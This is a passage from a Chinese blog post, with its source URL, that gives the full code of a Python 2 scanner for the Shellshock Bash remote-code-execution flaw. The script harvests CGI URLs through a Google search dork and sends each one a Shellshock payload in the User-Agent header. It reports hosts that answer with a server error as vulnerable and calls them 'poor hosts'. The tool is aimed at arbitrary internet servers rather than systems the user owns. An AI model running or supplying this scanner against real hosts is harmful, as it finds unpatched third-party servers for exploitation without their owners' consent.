思路就是以上这些,下面还是和往常一样,贴代码:
#coding=utf-8
import requests
import json
import sys
import threading
class GoogleURLProvider():
def __init__(self,pageCount,proxies):
self.pageCount = pageCount #查询的页数
self.keywords = r'inurl:cgi-bin filetype:sh'
self.apiurl = "https://ajax.googleapis.com/ajax/services/search/web"
self.proxies = proxies
def getRequest(self,url):
return requests.get(url,proxies=self.proxies,verify=False)
def getUrls(self):
ret_list = []
tmp_list = []
for x in xrange(0,self.pageCount):
url = "{apiurl}?v=1.0&q={keywords}&rsz=8&start={pageCount}".format(apiurl=self.apiurl,keywords=self.keywords,pageCount=x)
try:
r = self.getRequest(url)
results = json.loads(r.text)
if not results:
continue
infos = results['responseData']['results']
if infos:
for i in infos:
tmp_list.append(i['url'])
except Exception, e:
continue
ret_list = ret_list + tmp_list
return ret_list
class BashRCEDetector():
def __init__(self,urls):
self.urls = urls
def detector(self):
vul_res = []
useragent_header = {
'User-Agent':"() { :;}; echo -e 'detector'"
}
for x in self.urls:
try:
r = requests.get(x,headers = useragent_header,timeout=1)
if r.status_code == 500:
print "{url} has Bash RCE vulnerability".format(url=x)
vul_res.append(x)
else:
pass
except Exception, e:
continue
return vul_res
if __name__ == '__main__':
print 'Powered by:Exploit QQ:739858341'
print 'This is a program which you can use to scan the BashRCE vulnerability\nScanner working,please wait....'
if len(sys.argv) != 2:
print 'Usage:python BashRCEScanner <google pageCount>'
sys.exit()
#goagent proxy
#在这里修改,加入你自己的代理即可使用
proxies = {
'http':"http://127.0.0.1:8087",
'https':"http://127.0.0.1:8087"
}
url_res = []
vul_guys = []
urlgetter = GoogleURLProvider(int(sys.argv[1]),proxies)
url_res = urlgetter.getUrls()
bash_detector = BashRCEDetector(url_res)
vul_guys = bash_detector.detector()
if len(vul_guys) == 0:
print 'This group have no vulnerability'
else:
print 'Find %d poor host(s)' % len(vul_guys) 运行截图:
原文:http://blog.csdn.net/u011721501/article/details/39577393
